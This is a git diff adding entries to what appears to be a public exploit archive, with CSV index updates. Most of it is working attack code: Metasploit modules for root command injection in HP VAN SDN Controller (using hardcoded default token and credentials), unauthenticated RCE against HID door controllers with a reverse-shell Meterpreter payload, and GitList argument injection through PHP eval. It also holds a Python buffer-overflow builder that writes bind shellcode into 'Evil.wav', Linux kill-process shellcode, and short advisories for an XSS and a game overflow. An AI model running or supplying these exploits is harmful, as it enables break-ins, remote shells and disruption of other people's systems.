diff --git a/exploits/linux/dos/44994.html b/exploits/linux/dos/44994.html
new file mode 100644
index 000000000..900743d93
--- /dev/null
+++ b/exploits/linux/dos/44994.html
@@ -0,0 +1,30 @@
+# Exploit Title: Tor Browser - Use After Free (PoC)
+# Date: 09.07.2018
+# Exploit Author: t4rkd3vilz
+# Vendor Homepage: https://www.torproject.org/
+# Software Link: https://www.torproject.org/download/download-easy.html.en
+# Version: Tor 0.3.2.x before 0.3.2.10
+# Tested on: Kali Linux
+# CVE : CVE-2018-0491
+
+#Run exploit, result DOS
+
+
+
+
+veryhandsome jameel naboo
+
+
\ No newline at end of file
diff --git a/exploits/linux/remote/44991.rb b/exploits/linux/remote/44991.rb
new file mode 100755
index 000000000..0f9124dd5
--- /dev/null
+++ b/exploits/linux/remote/44991.rb
@@ -0,0 +1,197 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+ Rank = ExcellentRanking
+
+ # server: grizzly/2.2.16
+ HttpFingerprint = {pattern: [/^grizzly/]}
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'HP VAN SDN Controller Root Command Injection',
+ 'Description' => %q{
+ This module exploits a hardcoded service token or default credentials
+ in HPE VAN SDN Controller <= 2.7.18.0503 to execute a payload as root.
+
+ A root command injection was discovered in the uninstall action's name
+ parameter, obviating the need to use sudo for privilege escalation.
+
+ If the service token option TOKEN is blank, USERNAME and PASSWORD will
+ be used for authentication. An additional login request will be sent.
+ },
+ 'Author' => [
+ 'Matt Bergin', # Vulnerability discovery and Python exploit
+ 'wvu' # Metasploit module and additional ~research~
+ ],
+ 'References' => [
+ ['EDB', '44951'],
+ ['URL', 'https://korelogic.com/Resources/Advisories/KL-001-2018-008.txt']
+ ],
+ 'DisclosureDate' => 'Jun 25 2018',
+ 'License' => MSF_LICENSE,
+ 'Platform' => ['unix', 'linux'],
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Privileged' => true,
+ 'Targets' => [
+ ['Unix In-Memory',
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Type' => :unix_memory,
+ 'Payload' => {'BadChars' => ' '}
+ ],
+ ['Linux Dropper',
+ 'Platform' => 'linux',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Type' => :linux_dropper
+ ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => {'RPORT' => 8081, 'SSL' => true}
+ ))
+
+ register_options([
+ OptString.new('TOKEN', [false, 'Service token', 'AuroraSdnToken37']),
+ OptString.new('USERNAME', [false, 'Service username', 'sdn']),
+ OptString.new('PASSWORD', [false, 'Service password', 'skyline'])
+ ])
+
+ register_advanced_options([
+ OptString.new('PayloadName', [false, 'Payload name (random if unset)']),
+ OptBool.new('ForceExploit', [false, 'Override check result', false])
+ ])
+ end
+
+ def check
+ checkcode = CheckCode::Safe
+
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => '/',
+ 'headers' => {'X-Auth-Token' => auth_token},
+ 'ctype' => 'application/json',
+ 'data' => {'action' => 'uninstall'}.to_json
+ )
+
+ if res.nil?
+ checkcode = CheckCode::Unknown
+ elsif res && res.code == 400 && res.body.include?('Missing field: name')
+ checkcode = CheckCode::Appears
+ elsif res && res.code == 401 && res.body =~ /Missing|Invalid token/
+ checkcode = CheckCode::Safe
+ end
+
+ checkcode
+ end
+
+ def exploit
+ if [CheckCode::Safe, CheckCode::Unknown].include?(check)
+ if datastore['ForceExploit']
+ print_warning('ForceExploit set! Exploiting anyway!')
+ else
+ fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+ end
+ end
+
+ if target['Type'] == :unix_memory
+ print_status('Executing command payload')
+ execute_command(payload.encoded)
+ return
+ end
+
+ print_status('Uploading payload as fake .deb')
+ payload_path = upload_payload
+ renamed_path = payload_path.gsub(/\.deb$/, '')
+
+ register_file_for_cleanup(renamed_path)
+
+ print_status('Renaming payload and executing it')
+ execute_command(
+ "mv #{payload_path} #{renamed_path} && " \
+ "chmod +x #{renamed_path}"
+ )
+ execute_command(renamed_path)
+ end
+
+ def upload_payload
+ payload_name = datastore['PayloadName'] ?
+ "#{datastore['PayloadName']}.deb" :
+ "#{Rex::Text.rand_text_alphanumeric(8..42)}.deb"
+ payload_path = "/var/lib/sdn/uploads/#{payload_name}"
+
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => '/upload',
+ 'headers' => {'Filename' => payload_name, 'X-Auth-Token' => auth_token},
+ 'ctype' => 'application/octet-stream',
+ 'data' => generate_payload_exe
+ )
+
+ unless res && res.code == 200 && res.body.include?('{ }')
+ fail_with(Failure::UnexpectedReply, "Failed to upload #{payload_path}")
+ end
+
+ print_good("Uploaded #{payload_path}")
+
+ payload_path
+ end
+
+ def execute_command(cmd)
+ # Argument injection in /opt/sdn/admin/uninstall-dpkg
+ injection = "--pre-invoke=#{cmd}"
+
+ # Ensure we don't undergo word splitting
+ injection = injection.gsub(/\s+/, '${IFS}')
+
+ print_status("Injecting dpkg -r #{injection}")
+
+ send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => '/',
+ 'headers' => {'X-Auth-Token' => auth_token},
+ 'ctype' => 'application/json',
+ 'data' => {'action' => 'uninstall', 'name' => injection}.to_json
+ }, 1)
+ end
+
+ def auth_token
+ return @auth_token if @auth_token
+
+ token = datastore['TOKEN']
+ username = datastore['USERNAME']
+ password = datastore['PASSWORD']
+
+ if token && !token.empty?
+ print_status("Authenticating with service token #{token}")
+ @auth_token = token
+ return @auth_token
+ end
+
+ print_status("Authenticating with creds #{username}:#{password}")
+
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => '/sdn/ui/app/login',
+ 'rport' => 8443,
+ 'vars_post' => {'username' => username, 'password' => password}
+ )
+
+ unless res && res.get_cookies.include?('X-Auth-Token')
+ print_error('Invalid username and/or password specified')
+ return
+ end
+
+ @auth_token = res.get_cookies_parsed['X-Auth-Token'].first
+ print_good("Retrieved auth token #{@auth_token}")
+
+ @auth_token
+ end
+
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/44992.rb b/exploits/linux/remote/44992.rb
new file mode 100755
index 000000000..719db58bc
--- /dev/null
+++ b/exploits/linux/remote/44992.rb
@@ -0,0 +1,191 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::Udp
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'HID discoveryd command_blink_on Unauthenticated RCE',
+ 'Description' => %q{
+ This module exploits an unauthenticated remote command execution
+ vulnerability in the discoveryd service exposed by HID VertX and Edge
+ door controllers.
+
+ This module was tested successfully on a HID Edge model EH400
+ with firmware version 2.3.1.603 (Build 04/23/2012).
+ },
+ 'Author' =>
+ [
+ 'Ricky "HeadlessZeke" Lawshae', # Discovery
+ 'coldfusion39', # VertXploit
+ 'Brendan Coles' # Metasploit
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_ARMLE,
+ 'Privileged' => true,
+ 'References' =>
+ [
+ ['ZDI', '16-223'],
+ ['URL', 'https://blog.trendmicro.com/let-get-door-remote-root-vulnerability-hid-door-controllers/'],
+ ['URL', 'http://nosedookie.blogspot.com/2011/07/identifying-and-querying-hid-vertx.html'],
+ ['URL', 'https://exfil.co/2016/05/09/exploring-the-hid-eh400/'],
+ ['URL', 'https://github.com/lixmk/Concierge'],
+ ['URL', 'https://github.com/coldfusion39/VertXploit']
+ ],
+ 'DisclosureDate' => 'Mar 28 2016',
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 30,
+ 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',
+ 'CMDSTAGER::FLAVOR' => 'echo'
+ },
+ 'Targets' => [['Automatic', {}]],
+ 'CmdStagerFlavor' => 'echo', # wget is available, however the wget command is too long
+ 'DefaultTarget' => 0))
+ register_options [ Opt::RPORT(4070) ]
+ end
+
+ def check
+ connect_udp
+ udp_sock.put 'discover;013;'
+ res = udp_sock.get(5)
+ disconnect_udp
+
+ if res.to_s.eql? ''
+ vprint_error 'Connection failed'
+ return CheckCode::Unknown
+ end
+
+ hid_res = parse_discovered_response res
+ if hid_res[:mac].eql? ''
+ vprint_error 'Malformed response'
+ return CheckCode::Safe
+ end
+
+ @mac = hid_res[:mac]
+
+ vprint_good "#{rhost}:#{rport} - HID discoveryd service detected"
+ vprint_line hid_res.to_s
+ report_service(
+ host: rhost,
+ mac: hid_res[:mac],
+ port: rport,
+ proto: 'udp',
+ name: 'hid-discoveryd',
+ info: hid_res
+ )
+
+ if hid_res[:version].to_s.eql? ''
+ vprint_error "#{rhost}:#{rport} - Could not determine device version"
+ return CheckCode::Detected
+ end
+
+ # Vulnerable version mappings from VertXploit
+ vuln = false
+ version = Gem::Version.new(hid_res[:version].to_s)
+ case hid_res[:model]
+ when 'E400' # EDGEPlus
+ vuln = true if version <= Gem::Version.new('3.5.1.1483')
+ when 'EH400' # EDGE EVO
+ vuln = true if version <= Gem::Version.new('3.5.1.1483')
+ when 'EHS400' # EDGE EVO Solo
+ vuln = true if version <= Gem::Version.new('3.5.1.1483')
+ when 'ES400' # EDGEPlus Solo
+ vuln = true if version <= Gem::Version.new('3.5.1.1483')
+ when 'V2-V1000' # VertX EVO
+ vuln = true if version <= Gem::Version.new('3.5.1.1483')
+ when 'V2-V2000' # VertX EVO
+ vuln = true if version <= Gem::Version.new('3.5.1.1483')
+ when 'V1000' # VertX Legacy
+ vuln = true if version <= Gem::Version.new('2.2.7.568')
+ when 'V2000' # VertX Legacy
+ vuln = true if version <= Gem::Version.new('2.2.7.568')
+ else
+ vprint_error "#{rhost}:#{rport} - Device model was not recognized"
+ return CheckCode::Detected
+ end
+
+ vuln ? CheckCode::Appears : CheckCode::Safe
+ end
+
+ def send_command(cmd)
+ connect_udp
+
+ # double escaping for echo -ne stager
+ encoded_cmd = cmd.gsub("\\", "\\\\\\")
+
+ # packet length (max 44)
+ len = '044'
+
+ # of times to blink LED, if the device has a LED; else
+ # second to beep (very loudly) if the device does not have a LED
+ num = -1 # no beep/blink ;)
+
+ # construct packet
+ req = ''
+ req << 'command_blink_on;'
+ req << "#{len};"
+ req << "#{@mac};"
+ req << "#{num}`#{encoded_cmd}`;"
+
+ # send packet
+ udp_sock.put req
+ res = udp_sock.get(5)
+ disconnect_udp
+
+ unless res.to_s.start_with? 'ack;'
+ fail_with Failure::UnexpectedReply, 'Malformed response'
+ end
+ end
+
+ def execute_command(cmd, opts)
+ # the protocol uses ';' as a separator,
+ # so we issue each system command separately.
+ # we're using the echo command stager which hex encodes the payload,
+ # so there's no risk of replacing any ';' characters in the payload data.
+ cmd.split(';').each do |c|
+ send_command c
+ end
+ end
+
+ def exploit
+ print_status "#{rhost}:#{rport} - Connecting to target"
+
+ check_code = check
+ unless check_code == CheckCode::Appears || check_code == CheckCode::Detected
+ fail_with Failure::Unknown, "#{rhost}:#{rport} - Target is not vulnerable"
+ end
+
+ # linemax is closer to 40,
+ # however we need to account for additinal double escaping
+ execute_cmdstager linemax: 30, :temp => '/tmp'
+ end
+
+ def parse_discovered_response(res)
+ info = {}
+
+ return unless res.start_with? 'discovered'
+
+ hid_res = res.split(';')
+ return unless hid_res.size == 9
+ return unless hid_res[0] == 'discovered'
+ return unless hid_res[1].to_i == res.length
+
+ {
+ :mac => hid_res[2],
+ :name => hid_res[3],
+ :ip => hid_res[4],
+ # ? => hid_res[5], # '1'
+ :model => hid_res[6],
+ :version => hid_res[7],
+ :version_date => hid_res[8]
+ }
+ end
+end
\ No newline at end of file
diff --git a/exploits/php/remote/44993.rb b/exploits/php/remote/44993.rb
new file mode 100755
index 000000000..21f04cbe3
--- /dev/null
+++ b/exploits/php/remote/44993.rb
@@ -0,0 +1,67 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "GitList v0.6.0 Argument Injection Vulnerability",
+ 'Description' => %q{
+ This module exploits an argument injection vulnerability in GitList v0.6.0.
+ The vulnerability arises from GitList improperly validating input using the php function
+ 'escapeshellarg'.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Kacper Szurek', # EDB POC
+ 'Shelby Pace' # Metasploit Module
+ ],
+ 'References' =>
+ [
+ [ 'EDB', '44548' ],
+ [ 'URL', 'https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html']
+ ],
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Targets' =>
+ [
+ [ 'GitList v0.6.0', { } ]
+ ],
+ 'Privileged' => false,
+ 'Payload' => { 'BadChars' => '\'"' },
+ 'DisclosureDate' => "Apr 26 2018",
+ 'DefaultTarget' => 0))
+ end
+
+ def check
+ uri = normalize_uri(target_uri.path, '/gitlist/')
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => uri
+ )
+
+ if res && res.code == 200 && /Powered by .*GitList 0\.6\.0/.match(res.body)
+ return Exploit::CheckCode::Appears
+ end
+
+ Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search')
+ cmd = '--open-files-in-pager=php -r "eval(\\"'
+ cmd << payload.encoded
+ cmd << '\\");"'
+ send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => postUri,
+ 'vars_post' => { 'query' => cmd }
+ )
+ end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/44988.txt b/exploits/php/webapps/44988.txt
new file mode 100644
index 000000000..b98a00a34
--- /dev/null
+++ b/exploits/php/webapps/44988.txt
@@ -0,0 +1,32 @@
+######################
+# Author Information #
+######################
+Author : Ahmed Elhady Mohamed
+twitter : @Ahmed__ELhady
+Date : 01/07/2018
+########################
+# Software Information #
+########################
+Affected Software : SeoChecker Umbraco CMS Plug-in
+Version: version 1.9.2
+Software website : https://soetemansoftware.nl/seo-checker
+
+###############
+# Description #
+###############
+SeoChecker Umbraco CMS Plug-in version 1.9.2 is vulnerable to stored cross-site scripting vulnerability in two parameters
+which are SEO title and SEO description HTML parameters fields. A low privilege authenticated user who can edit the SEO tab
+parameter value for any Ubmraco CMS content like an article will be able to inject a malicious code to execute arbitrary HTML
+and JS code in a user's browser session in the context of an affected site. so when a high privilege user tries to access/edit
+the article content. the JS code will be executed. The vulnerabilities are tested on 1.9.2 version and Other versions may also be affected.
+
+
+#################
+# Exlpoit Steps #
+#################
+1- Access the application with a low privilege authenticated user
+2- Go to the SEO tab for any article
+3-Enter the following payload in SEO title and SEO description HTML parameters fields parameters
+">
+4- Access the article content page to edit and change contents value.
+5- The JS code will be executed.
\ No newline at end of file
diff --git a/exploits/windows/local/44989.py b/exploits/windows/local/44989.py
new file mode 100755
index 000000000..dabd40864
--- /dev/null
+++ b/exploits/windows/local/44989.py
@@ -0,0 +1,55 @@
+# Exploit Title: Boxoft wav-wma Converter - Local Buffer Overflow (SEH)
+# Date: 2018-07-08
+# Software Link: http://www.boxoft.com/wav-to-wma/
+# Software Version:1.0
+# Exploit Author: Achilles
+# Target: Windows 7 x64
+# CVE:
+# Description: A malicious .wav file cause this vulnerability.
+# Category: Local Exploit
+
+buffer = "A" * 4132
+buffer+= "\x90\x90\xeb\x06" #jmp short 6
+buffer+= "\x34\x14\x40\x00" # pop pop retn
+buffer+= "\x90" * 20
+buffer+= ("\xda\xd5\xb8\x9b\x69\x4d\xa1\xd9\x74\x24\xf4\x5a\x33" #Bind shellcode port 4444
+"\xc9\xb1\x60\x83\xc2\x04\x31\x42\x15\x03\x42\x15\x79"
+"\x9c\xf2\x9b\x0c\xb0\x35\x05\x03\x97\x32\x91\x2f\x75"
+"\x92\x10\x7e\xdf\xd5\xdf\x95\x63\xd0\x24\x96\x1e\xca"
+"\xc6\x57\x4b\xd9\xe7\x3c\xe4\x1c\xa0\xd9\x7e\x72\xe4"
+"\x38\x26\xd1\x92\x88\x79\x63\x55\xe3\x94\xfe\x9a\xac"
+"\xb5\xde\xe4\x35\xbc\xd0\x9f\xe6\x92\x63\x51\x5a\xaf"
+"\xad\x1b\xb0\xf9\x6e\x46\xac\x68\xa9\x48\xce\xb8\xe1"
+"\xd2\xf5\x1a\x7d\x84\xde\xb9\x55\xa0\xe8\xe3\xd8\xb2"
+"\x31\xfb\x1a\x0b\xea\xed\xf4\x8f\xdd\xf5\x55\xbf\x1a"
+"\xa5\xe8\xd8\xfa\xde\x45\x11\x7c\x4d\xea\x87\x0f\x9f"
+"\xe5\xdf\x90\x18\x7e\x52\x1b\xd7\x24\x22\xab\x1b\xda"
+"\x31\xa2\x75\x8f\xa3\x13\x99\x20\x5e\x07\x57\x68\x3e"
+"\x10\xc7\xc2\xb0\x2b\xa0\x13\xd6\x6a\x3e\xc3\x1e\x99"
+"\x4f\xf0\xce\x63\x50\xe3\x90\x80\x3e\x0e\x9c\x39\x7e"
+"\x48\xe6\xf0\xe7\x3b\xd3\x7d\xe3\xa3\x62\x41\xee\x19"
+"\xd0\xa8\xc9\xdb\x02\x93\x0f\x34\xb0\xad\x81\x08\x57"
+"\xce\xb8\x38\xfe\x13\xc9\xe7\x40\xc2\x17\xa6\x3a\x4c"
+"\x06\x31\xfc\x3f\x8f\xcb\x85\x84\x74\x98\x9c\x63\xe5"
+"\x46\x2f\xfc\x15\x3b\x5c\x37\xd3\x36\xfc\x39\x3c\x86"
+"\x29\x32\xbb\xb3\x04\x13\x6a\xd1\xa7\x55\xac\x8e\xa8"
+"\x05\xaf\xc3\xae\x9d\xc6\x5f\xa8\x9d\x8e\x4a\x25\x3a"
+"\x35\xa3\xd7\x4c\xaa\xb1\x87\xca\x54\x6d\xdc\xb2\xf3"
+"\x3a\xaa\x29\xea\x44\x01\x4e\xb0\x08\x9a\xd0\xb5\x69"
+"\x42\xe5\xb4\x5f\x59\xff\xb4\x90\xe2\x97\x66\x09\x89"
+"\x87\x8e\xff\xa8\x21\x68\x3f\x01\xe9\xb3\x27\x63\xd2"
+"\x93\x2f\x4d\x9c\x28\x21\xd4\x9d\xad\x8f\x24\x19\xc9"
+"\x98\xbc\x24\x0b\x47\x84\x9c\x57\xd2\x20\x79\x71\x67"
+"\xe0\xd1\xcd\x40\x51\x7d\xe2\x39\xa9\xd2\x92\x4c\x24"
+"\x59\x7b\xfd\x89\x6e\xea\xec\xc8\xac\x54\x8a\x26\x60"
+"\x81\x38\x06\x32\xab\x56\x1c\xe7\xd0\x78\xe5\xa2\x75"
+"\xc8\x28\x1b\xd5\x3f\x51")
+
+try:
+ f=open("Evil.wav","w")
+ print "[+] Creating %s bytes evil payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/remote/44987.txt b/exploits/windows/remote/44987.txt
new file mode 100644
index 000000000..a69942b10
--- /dev/null
+++ b/exploits/windows/remote/44987.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Stack-based buffer overflow in Activision Infinity Ward Call of Duty Modern Warfare 2
+# Date: 14-12-2017
+# Exploit Author: Maurice Heumann
+# Contact: https://twitter.com/momo5502?lang=en
+# Website: https://momo5502.com/
+# CVE: CVE-2018-10718
+# Category: webapps
+
+1. Description
+
+By sending a crafted network packet, it's possible construct a stack
+overflow in Call of Duty: Modern Warfare (amongst other versions).
+
+2. Proof of Concept
+
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44987.zip
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 813259b06..07951462d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6012,6 +6012,7 @@ id,file,description,date,author,type,platform,port
44962,exploits/linux/dos/44962.txt,"SIPp 3.6 - Local Buffer Overflow (PoC)",2018-07-02,"Fakhri Zulkifli",dos,linux,
44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80
44972,exploits/linux/dos/44972.py,"openslp 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux,
+44994,exploits/linux/dos/44994.html,"Tor Browser < 0.3.2.10 - Use After Free (PoC)",2018-07-09,t4rkd3vilz,dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9805,6 +9806,7 @@ id,file,description,date,author,type,platform,port
44971,exploits/windows/local/44971.rb,"Boxoft WAV to MP3 Converter 1.1 - Buffer Overflow (Metasploit)",2018-07-03,Metasploit,local,windows,
44983,exploits/hardware/local/44983.txt,"ADB Broadband Gateways / Routers - Local Root Jailbreak",2018-07-05,"SEC Consult",local,hardware,
44984,exploits/hardware/local/44984.txt,"ADB Broadband Gateways / Routers - Privilege Escalation",2018-07-05,"SEC Consult",local,hardware,
+44989,exploits/windows/local/44989.py,"Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH)",2018-07-09,Achilles,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16599,6 +16601,10 @@ id,file,description,date,author,type,platform,port
44968,exploits/windows/remote/44968.rb,"FTPShell Client 6.70 (Enterprise Edition) - Stack Buffer Overflow (Metasploit)",2018-07-02,Metasploit,remote,windows,
44969,exploits/linux/remote/44969.rb,"Nagios XI 5.2.6-5.4.12 - Chained Remote Code Execution (Metasploit)",2018-07-02,Metasploit,remote,linux,80
44985,exploits/windows/remote/44985.c,"PolarisOffice 2017 8 - Remote Code Execution",2018-07-06,hyp3rlinx,remote,windows,
+44987,exploits/windows/remote/44987.txt,"Activision Infinity Ward Call of Duty Modern Warfare 2 - Buffer Overflow",2018-07-09,"Maurice Heumann",remote,windows,
+44991,exploits/linux/remote/44991.rb,"HP VAN SDN Controller - Root Command Injection (Metasploit)",2018-07-09,Metasploit,remote,linux,8081
+44992,exploits/linux/remote/44992.rb,"HID discoveryd - command_blink_on Unauthenticated RCE (Metasploit)",2018-07-09,Metasploit,remote,linux,4070
+44993,exploits/php/remote/44993.rb,"GitList 0.6.0 - Argument Injection (Metasploit)",2018-07-09,Metasploit,remote,php,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39629,3 +39635,4 @@ id,file,description,date,author,type,platform,port
44978,exploits/php/webapps/44978.txt,"ShopNx - Arbitrary File Upload",2018-07-04,L0RD,webapps,php,
44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80
44986,exploits/windows/webapps/44986.txt,"Airties AIR5444TT - Cross-Site Scripting",2018-07-06,"Raif Berkay Dincel",webapps,windows,80
+44988,exploits/php/webapps/44988.txt,"Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting",2018-07-09,"Ahmed Elhady Mohamed",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index fcc18ea0f..05f42857c 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -893,3 +893,4 @@ id,file,description,date,author,type,platform
44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm
44856,shellcodes/arm/44856.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (60 bytes)",2018-06-08,rtmcx,shellcode,arm
44963,shellcodes/linux_x86/44963.c,"Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86
+44990,shellcodes/linux_x86/44990.c,"Linux/x86 - Kill Process Shellcode (20 bytes)",2018-07-09,"Nathu Nandwani",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/44990.c b/shellcodes/linux_x86/44990.c
new file mode 100644
index 000000000..e88358fac
--- /dev/null
+++ b/shellcodes/linux_x86/44990.c
@@ -0,0 +1,33 @@
+/*
+ Exploit Title: Kill PID shellcode
+ Date: 07/09/2018
+ Exploit Author: Nathu Nandwani
+ Platform: Linux/x86
+ Size: 20 bytes
+ Compile: gcc -fno-stack-protector -z execstack killproc.c -o killproc
+*/
+#include
+#include
+int main()
+{
+ unsigned short pid = 2801;
+
+ char shellcode[] =
+ "\x31\xc0" /* xor eax, eax */
+ "\xb0\x25" /* mov al, 0x25 - SYS_KILL */
+ "\x89\xc3" /* mov ebx, eax */
+ "\x89\xc1" /* mov ecx, eax */
+ "\x66\xbb" /* mov bx, ? */
+ "\xF1\x0A" /* bx <= pid => 2801 = 0x0AF1 */
+ "\xb1\x09" /* mov cl, 0x09 - SIGKILL */
+ "\xcd\x80" /* int 0x80 */
+ "\xb0\x01" /* mov al, 0x01 */
+ "\xcd\x80"; /* int 0x80 */
+
+ shellcode[10] = pid & 0xff;
+ shellcode[11] = (pid >> 8) & 0xff;
+
+ printf("Shellcode length: %d\n", strlen(shellcode));
+ int (*ret)() = (int(*)())shellcode;
+ ret();
+}
\ No newline at end of file